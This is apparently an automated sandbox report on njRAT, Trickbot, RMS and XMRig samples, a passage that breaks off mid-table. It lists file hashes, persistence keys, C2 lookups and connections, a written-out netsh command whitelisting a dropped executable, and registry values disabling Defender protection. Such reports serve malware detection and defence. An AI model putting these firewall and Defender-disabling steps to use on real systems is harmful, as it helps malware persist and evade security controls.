C:\Users\Admin\AppData\Local\Temp\RESA7.tmp
| MD5 | cbbde53ca1c9efe25b45964324d3ccdf |
| SHA1 | fc26324c55cff30e8e65717f89eff996afa3c2e8 |
| SHA256 | bbd58455633fe9751d48362ee833dec5edbd24dfcc33c7278b2270192ac62ff3 |
| SHA512 | 1431582ccddeb6051be560d7c80c6ccbf2711ad58a210bb4beb5c15407eee95f9775628a595f4cf7d28ab239f2c17fe459ae4d91ffcfa086e87102e905203830 |
C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.0.vb
| MD5 | e8615295f45d210bf3b7d023e3688b9f |
| SHA1 | e33be2e3faddd8e48f62e0f30ad3cdc08bae7e33 |
| SHA256 | c81a9b36d60cc8d54374337bf1b116165c41be0cd2460ac35223fb790f5f94fc |
| SHA512 | b48fa683711c9cd16f6e4e007145a508b617bbf9847efc1d81cdea75dda43bf88a3d094fc93fe8ef7c4b55e3dd1c4e687a6044b504b106262b2566c4ab944919 |
C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.cmdline
| MD5 | 95b38a8c74981d82ec525799015d6d97 |
| SHA1 | 25c460885892cba97805154db9a55bac96217840 |
| SHA256 | 08e6d44598e49dc7c99439a2e1088496d80a106bd9db9bdfe3cdecf42b381397 |
| SHA512 | e8ae2c21121efe82b515e6e416d83d19d51e3968f27a0597dcee43afa24ea4ffbc65340000375456bfdeadaa62525114e4a548368980823df42536cdd2697897 |
C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.0.vb
| MD5 | 6a3d4925113004788d2fd45bff4f9175 |
| SHA1 | 79f42506da35cee06d4bd9b6e481a382ae7436a1 |
| SHA256 | 21be523eca2621b9e216b058052970dc749312d2c26836639d8e8faff94c76bb |
| SHA512 | 2cfdecfa0604ad7fd54f68bf55e7c52701c7b196de51412e172526affffd6e6c4bc443b6df0fb21d2c777c809aa4e3809bd2b5b385e0d033604b6b653a0f416d |
C:\Users\Admin\AppData\Local\Temp\RES105.tmp
| MD5 | 4dcb9e3d915984508e95120284430d30 |
| SHA1 | b149fa1ca70c616347403e0f1f0fb66873d5fa43 |
| SHA256 | 0dda42e578d4c39562b7ca5809ccbe2c607484c3768c202c0bcb7e7174b8360f |
| SHA512 | 30b097e468e76fdc23800a79e7e1031d9e00f77cd0294a3f19c2d12afe4b0c60f481ca28a356bc368fefdafa062462a5f4bf7bb36b2b4a5656b5414e3b916db9 |
C:\Users\Admin\AppData\Local\Temp\vbc52E7355544C1497E83611B5748B758.TMP
| MD5 | 40106f913688ab0f9bcbe873333d3dbd |
| SHA1 | bbe7cd918242a4ddc48bdcd394621cccf5a15d91 |
| SHA256 | 1d1a8ff68478aed22714dab15691996d196dc975a18f656261417dfdd85dcf47 |
| SHA512 | 67052405e9a8bdf9d836af9fdb13f0a4f57e7e90f0d2c3c5fd10830423e1401193699ff3b195e0cdcb2a89a3582f623ec9e5ebbef899300cf354c0ae89b765d7 |
C:\Users\Admin\AppData\Local\Temp\els-cvvq.cmdline
| MD5 | 77b7e08a21b64081672999053e98d8a1 |
| SHA1 | 7542f0a67b0c87316330a58f014f367aed7d0c9e |
| SHA256 | 5aac853ef61bf31b47475c0afea8528f4061e2bdace6e5e1bb10c84f5a7e8ba8 |
| SHA512 | e62105ac8ddaaf7bc7a8b4fdb8e9327233ea10d14beeb5932e7b2de14593d12bffac870ce0465344b5d435395a7e53d71667af45dbecc49f92b667c1341fe96d |
C:\Users\Admin\AppData\Local\Temp\els-cvvq.0.vb
| MD5 | a236870b20cbf63813177287a9b83de3 |
| SHA1 | 195823bd449af0ae5ac1ebaa527311e1e7735dd3 |
| SHA256 | 27f6638f5f3e351d07f141cabf9eb115e87950a78afafa6dc02528113ad69403 |
| SHA512 | 29bec69c79a5458dcd4609c40370389f8ec8cc8059dd26caeaf8f05847382b713a5b801339298ff832305dd174a037bfdb26d7417b1b1a913eacf616cd86f690 |
C:\Users\Admin\AppData\Local\Temp\RES162.tmp
| MD5 | 99f16affd591ad8d11bae3b4f2fc0269 |
| SHA1 | d27ebe790eb5c1d2198e9af0e7a954fbe4175faa |
| SHA256 | e2a9e59953d56f1349a3f0946fd33ebaa3a8ace8b4402de67abcf8f8d2de0dfb |
| SHA512 | 0353bfd63ade6f0da3f07c59b6e380ac3a152f8f6790f20cd1eebaee3cfdb27b69a9936749a4654488a6dc31c583e974c891f93d285d137f8d7a53718873e337 |
C:\Users\Admin\AppData\Local\Temp\vbcCAD5E4C644E242F4828C7A1F581E84F.TMP
| MD5 | 38a9e24f8661491e6866071855864527 |
| SHA1 | 395825876cd7edda12f2b4fda4cdb72b22238ba7 |
| SHA256 | a0dba3d6dd5111359fcaeea236f388b09fe23c4f8ec15417d5de1abf84958e96 |
| SHA512 | 998fb6143141262e98dd6109bd43e1fc7389728a047d819b4a176b39bb1594e5f36c1e38cbbe41023bb91a32a33b0aa9901da1dda82513882ade7f8bd4196755 |
C:\Users\Admin\AppData\Local\Temp\w-vdve3v.cmdline
| MD5 | cfe3beee956a7055ee0d704c23e25644 |
| SHA1 | 4ebe6f0e4ba38bdf0ead081f970b0a6636a859fb |
| SHA256 | 73ab51af248f4b47b2188418a7b281186b45a0f43a34f5871fd6de698d70b34f |
| SHA512 | f8f8bbd8e5551fc9ffba2ce49da5463549eb41885e5b9b01d3652a1cf7cfd396a751cfbf39947281f9c49480c05bbef4000c62540d9761ab8333fed40d36def0 |
C:\Users\Admin\AppData\Local\Temp\w-vdve3v.0.vb
| MD5 | 44ab29af608b0ff944d3615ac3cf257b |
| SHA1 | 36df3c727e6f7afbf7ce3358b6feec5b463e7b76 |
| SHA256 | 03cbb9f94c757143d7b02ce13e026a6e30c484fbadfb4cd646d9a27fd4d1e76d |
| SHA512 | 6eefa62e767b4374fa52fd8a3fb682a4e78442fe785bfe9b8900770dbf4c3089c8e5f7d419ec8accba037bf9524ee143d8681b0fae7e470b0239531377572315 |
C:\Users\Admin\AppData\Local\Temp\RES1D0.tmp
| MD5 | 093669c25c4598fda3069a55cbca1f12 |
| SHA1 | 1985a2dab9b8958494f8b71ada6bc232ba5680fc |
| SHA256 | a26267b044a09be465a326acd22a09b838b8447cdffc13b6136440949753e225 |
| SHA512 | d64b33cbc94f8108729acd8524c6f79d320b6652d731f5898074191d6621ff642c4b6b5422f396f7b9fcba5ba916c1fe111e8031b341ef5581cbb02f75559cb6 |
C:\Users\Admin\AppData\Local\Temp\vbc4096DB147B10453A98917E85DB63EAF.TMP
| MD5 | 17a9f4d7534440cae9e1b435719eceb9 |
| SHA1 | bc4c3569dbd3faf4beac74a4b3ea02b33e019530 |
| SHA256 | 5e05232caa624438da3cd74d3cf72b04c2b383fd68448a110b892a4913e91470 |
| SHA512 | 673b374c701d5756a55fd20122b00c497843b5116cc6e7dfd4b71755a692024d70a30c00f803427c343f2227ed5bc48df67234a41cb88dbf5eed70810e470f07 |
C:\Users\Admin\AppData\Local\Temp\6sywpk7h.cmdline
| MD5 | 44c0207a2520e50d6a4a7382da9dbf9e |
| SHA1 | 66b9a02206adb3083554859e38656834082f8013 |
| SHA256 | cd37f4c29fd491f47d5fc6f864187a8ff428b8ccb4c3f97c9afa3b3f0cd014b3 |
| SHA512 | 2a861d8327b76da06c14d9bbfdc090d5f74e5e242686fbbdf7d5f1291367a56b4335dbefd409fa258d863d7d519e4a895b7f989903c821634b13d6398613b2cf |
C:\Users\Admin\AppData\Local\Temp\6sywpk7h.0.vb
| MD5 | 0ad1ae93e60bb1a7df1e5c1fe48bd5b2 |
| SHA1 | 6c4f8f99dfd5a981b569ce2ddff73584ece51c75 |
| SHA256 | ea68ce9d33bd19a757922ba4540978debcba46f1133fbc461331629e666d6397 |
| SHA512 | a137a8f18a2b2ff9c31556044dd7c41fb589a6a52b15e4dc6cbb3ba47ab4a06d8b9ad54fb498100dab33f8a217848d31f14daca736045afb4f76ffb650b17f03 |
C:\Users\Admin\AppData\Local\Temp\vbc273C6A3A5576456A99FBC6AB83E3F6A.TMP
| MD5 | 3ca7194685ffa7c03c53d5a7dbe658b1 |
| SHA1 | c91550da196d280c258d496a5b482dfdae0d337c |
| SHA256 | 09fd06c1908591feac9dcda2a519bf862519267cd4e42c9d25b772b1d9161f39 |
| SHA512 | 949801ea9aa592e118678ff62949633e9f0502f2c07bbb398484de6911f9cf652f40bfb446aee8ec59f6262fb8da8792efa56119c90eee44a199dab7226b54b9 |
C:\Users\Admin\AppData\Local\Temp\RES22E.tmp
| MD5 | 55ad4a421e72aeeebdacd497e290a805 |
| SHA1 | 45c20afb946af4499a27af2e16b41e96a4f99689 |
| SHA256 | 4e2d0413815496b0b8a858d6945a88a3e8aa8899dd5f8a28ebf08343c22e506a |
| SHA512 | 9c3bcc2ea864b2a0a7e71581b6526ca959620a8a21013a7a711640904920737e97ac7bd521141df329622af3e6516f052f25bb50071bb27bf63a267c1ef72a0e |
C:\Users\Admin\AppData\Local\Temp\lbxakjmm.cmdline
| MD5 | 268323d591eb97b088de4633149f9aab |
| SHA1 | ba9c8f29164ff4c603e4571f5a74a57a3710eb9e |
| SHA256 | e9fb199a240a2126f453fa9e725a0ebbf5b94f2015d57d675f76f0bade3b0913 |
| SHA512 | a0b13d3b82ff472b1dac613964899265833ea31c9c2290c9398b949f3ceb1d6962b04da29e351fd81e8f1a4796cefb167660ba6eb3f596df48aa430fe456b310 |
C:\Users\Admin\AppData\Local\Temp\vbc6331EDE1F6164333905634FAD2D9E6A7.TMP
| MD5 | 694fb05871caccdce836dd0f109c4f86 |
| SHA1 | 0cfa12096a38ce2aa0304937589afc24589ff39a |
| SHA256 | bc1513ac66cd5adf438ed32370cf1bb219e07e602cc796525b822b0bd78b12fe |
| SHA512 | 50944dfe4013054ddf1529e6fe4d23af42aada5164dfea1316fbf18846e38006ba3cc8ef03dd6ab7ceb810ccf25dafc0fb790e2a6a0b0f3b2197b640d65cacd4 |
C:\Users\Admin\AppData\Local\Temp\RES28B.tmp
| MD5 | 410449f33c7f5c022a1c1eac007bc50c |
| SHA1 | f149e438a47f1e20d7600196f16d24df29d3e508 |
| SHA256 | fc2fcc124fea7b9a360adee8a65a8289444b5a0b7831f5c846b07865d9e7c97a |
| SHA512 | 7c1062c7a867965ec41554fb97ceac26e15e4d58e9caf2e3715be0b0270b1be3e4a72a4d300672c96aa0e033e868143799bff4a6836a2a1b36bed999cc379580 |
C:\Users\Admin\AppData\Local\Temp\lbxakjmm.0.vb
| MD5 | 7d4fad6697777f5a8450a12c8d7aa51f |
| SHA1 | 879db5558fb1a6fac80a5f7c5c97d5d293a8df5c |
| SHA256 | 741018cae167c9f6c1206e75ddf3d758543f9a16bec5d56a07fab9eb5439e3f6 |
| SHA512 | 6a31b4eab1829db245773e18e97f9a9956224174e28218476e45e8907bf8b4341ed732a0153a320cb956f2eca4e014c1ef6b0c6f627cf97a79b7a81f8e1fe144 |
C:\Users\Admin\AppData\Local\Temp\wup2lvx9.0.vb
| MD5 | 40650ce23f89e4cd8462efe73fa023ce |
| SHA1 | 8709317f898d137650ecb816743e3445aa392f75 |
| SHA256 | ae23b3ffff9fb03b649f412247c342e9cd970e371b0d5dea6be75a26617a5afb |
| SHA512 | b6ec7998e2a9703e2badcb41e60128f340c1c4ffcb9aa2c6532b3dc18024abdec1f739148f45d66417df84f3beed1a15ddbf9f33da073018ab902531ccbde850 |
C:\Users\Admin\AppData\Local\Temp\wup2lvx9.cmdline
| MD5 | 13042d89c345b3625a519dee63fed807 |
| SHA1 | 8ea358a4d87242fb5079356813a296a3fa106fbc |
| SHA256 | 28094cc1d930e084b075263e5d8473614deb802d8639713ecf4ccd4762679d0a |
| SHA512 | aae12a606c251d96c74696292effbf9e2002078e43130608b370bd77c47baea1187613e0d923a6f6048e949dab69a7cd415007c89e3b871f94a903c6f09faeb0 |
C:\Users\Admin\AppData\Local\Temp\RES2E9.tmp
| MD5 | ff7c5edf2516d700618336840445b893 |
| SHA1 | f86e97833495e0acbc775191e72f27a85856601d |
| SHA256 | 86ee465351b6a1770a69ea971a229545b71968d8175794d697395523296b1fcb |
| SHA512 | c2ee8b8c2510c966042f18e75583fd30c7f03c5412c0ce107fbabba701bc8022eee7cdbcd60287a0d1b7e0068aaa94d4a6a47e9a19ebfa76038f29c54a9194d2 |
C:\Users\Admin\AppData\Local\Temp\vbc39DCF8D5AE70476C9C21A71D6D52D9CB.TMP
| MD5 | b751c6d2b6e47c4ca34e85791d8d82ff |
| SHA1 | e9e7402eece094b237e1be170fecc62b33ffb250 |
| SHA256 | c66789b3014305976b263fa7bbb629bcf543d07f0c2bfa11cde4a2aa957b26d4 |
| SHA512 | d9f7a8a1ffffcf13c6fa35a8a76f9adbde49ebfe1de6a4fa0e3e0cfcd3a28e035a0ba5a6e5d9a4c5fc9cad2adf1f93fecff036f1540f3f623fdafa226f2ded0b |
C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.0.vb
| MD5 | 37c6619df6617336270b98ec25069884 |
| SHA1 | e293a1b29fd443fde5f2004ab02ca90803d16987 |
| SHA256 | 69b5796e1bb726b97133d3b97ebb3e6baac43c0474b29245a6b249a1b119cd33 |
| SHA512 | c19774fc2260f9b78e3b7ee68f249ce766dcdc5f8c5bc6cfc90f00aa63ce7b4d8c9b5c6f86146aa85e15fd0c5be7535cc22e0a9949ef68fbd5aca0436c3bd689 |
C:\Users\Admin\AppData\Local\Temp\vbc20603B019A994E2C847E4CF5B991EE8.TMP
| MD5 | 9874538991433131fb3158b7b1f83d46 |
| SHA1 | 9e9efd410b28be52f091ceab335eb1e6ed8e001c |
| SHA256 | 2d5286b5a40631602fb0c35d2b9da6236434a22f3dfc1b98239987d72ae8d04c |
| SHA512 | 9ee53b9dccdc5418870ffee74e692b01c0d78305bebbb360d01aa628957914a4ed8f36afa83cbc016ee8694b8da8d08fec4de4b227b6429b5f1f48b13a3efb42 |
C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.cmdline
| MD5 | da1119e67d9b0b1952a3d4d5744fec75 |
| SHA1 | ac6c6b2fdb256a3857327b72026304fd5eb04d54 |
| SHA256 | 12d2ca90b48708ef4da7b5a0cb47249547fcfb40fb07f475ba9bca50e1826d9a |
| SHA512 | b188afc7b1908ce16e72c03be7b380df822c6fb44848f0cf505b539d03b307aa54e09fb5f68b2e384110a06c33d28901e0be652bee24abdc49e76871c59c1721 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c6c84eeabbf10b049aa4efdb90558a88 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c6c84eeabbf10b049aa4efdb90558a88 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4640 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe | C:\Users\Admin\AppData\Local\Temp\server.exe |
| PID 4640 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe | C:\Users\Admin\AppData\Local\Temp\server.exe |
| PID 4640 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe | C:\Users\Admin\AppData\Local\Temp\server.exe |
| PID 3656 wrote to memory of 4044 | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 3656 wrote to memory of 4044 | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 3656 wrote to memory of 4044 | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | C:\Windows\SysWOW64\netsh.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe
"C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
| US | 8.8.8.8:53 | srpmx.ddns.net | udp |
Files
memory/4640-0-0x00000000750F2000-0x00000000750F3000-memory.dmp
memory/4640-1-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/4640-2-0x00000000750F0000-0x00000000756A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\server.exe
| MD5 | 9ab1a677fb73e7c5a41d151c4c21f69e |
| SHA1 | 10219ed34a3f76ca7fe30eb27a1a78d83c9ada37 |
| SHA256 | 2027c43348230de4a40e7ec590d692f744f36cdb13eb65f599983158e920cdb9 |
| SHA512 | 0c9f2e1555c36a3742a2ec604faf9a89bfd856946024596912bc116ad7f4fd15ee67969704956d30d70e7b6cb3a626168c309add57469adb03d389df0596f3c5 |
memory/3656-13-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/4640-12-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/3656-14-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/3656-15-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/3656-16-0x00000000750F0000-0x00000000756A1000-memory.dmp
memory/3656-17-0x00000000750F0000-0x00000000756A1000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
Trickbot
Trickbot family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\openme.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\openme.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wermgr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2008 wrote to memory of 2220 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\splwow64.exe |
| PID 2008 wrote to memory of 2220 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\splwow64.exe |
| PID 2008 wrote to memory of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\system32\wermgr.exe |
| PID 2008 wrote to memory of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\system32\wermgr.exe |
| PID 2008 wrote to memory of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\system32\wermgr.exe |
| PID 2008 wrote to memory of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\openme.exe | C:\Windows\system32\wermgr.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\openme.exe
"C:\Users\Admin\AppData\Local\Temp\openme.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2008 -ip 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 680
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| IN | 103.146.232.5:449 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| BD | 103.156.126.232:449 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| BD | 103.131.157.161:449 | tcp | |
| ID | 103.52.47.20:449 | tcp | |
| BD | 103.150.68.124:449 | tcp | |
| ZA | 102.164.206.129:449 | tcp |
Files
memory/2008-14-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-13-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-12-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-11-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-10-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-9-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-8-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-7-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-6-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-5-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-4-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-3-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-2-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/2008-15-0x00000000038A0000-0x00000000038DA000-memory.dmp
memory/2008-16-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/3892-49-0x000001F87B3A0000-0x000001F87B3A1000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Programdata\RealtekHD\taskhost.exe | N/A |
RMS
Rms family
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
xmrig
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
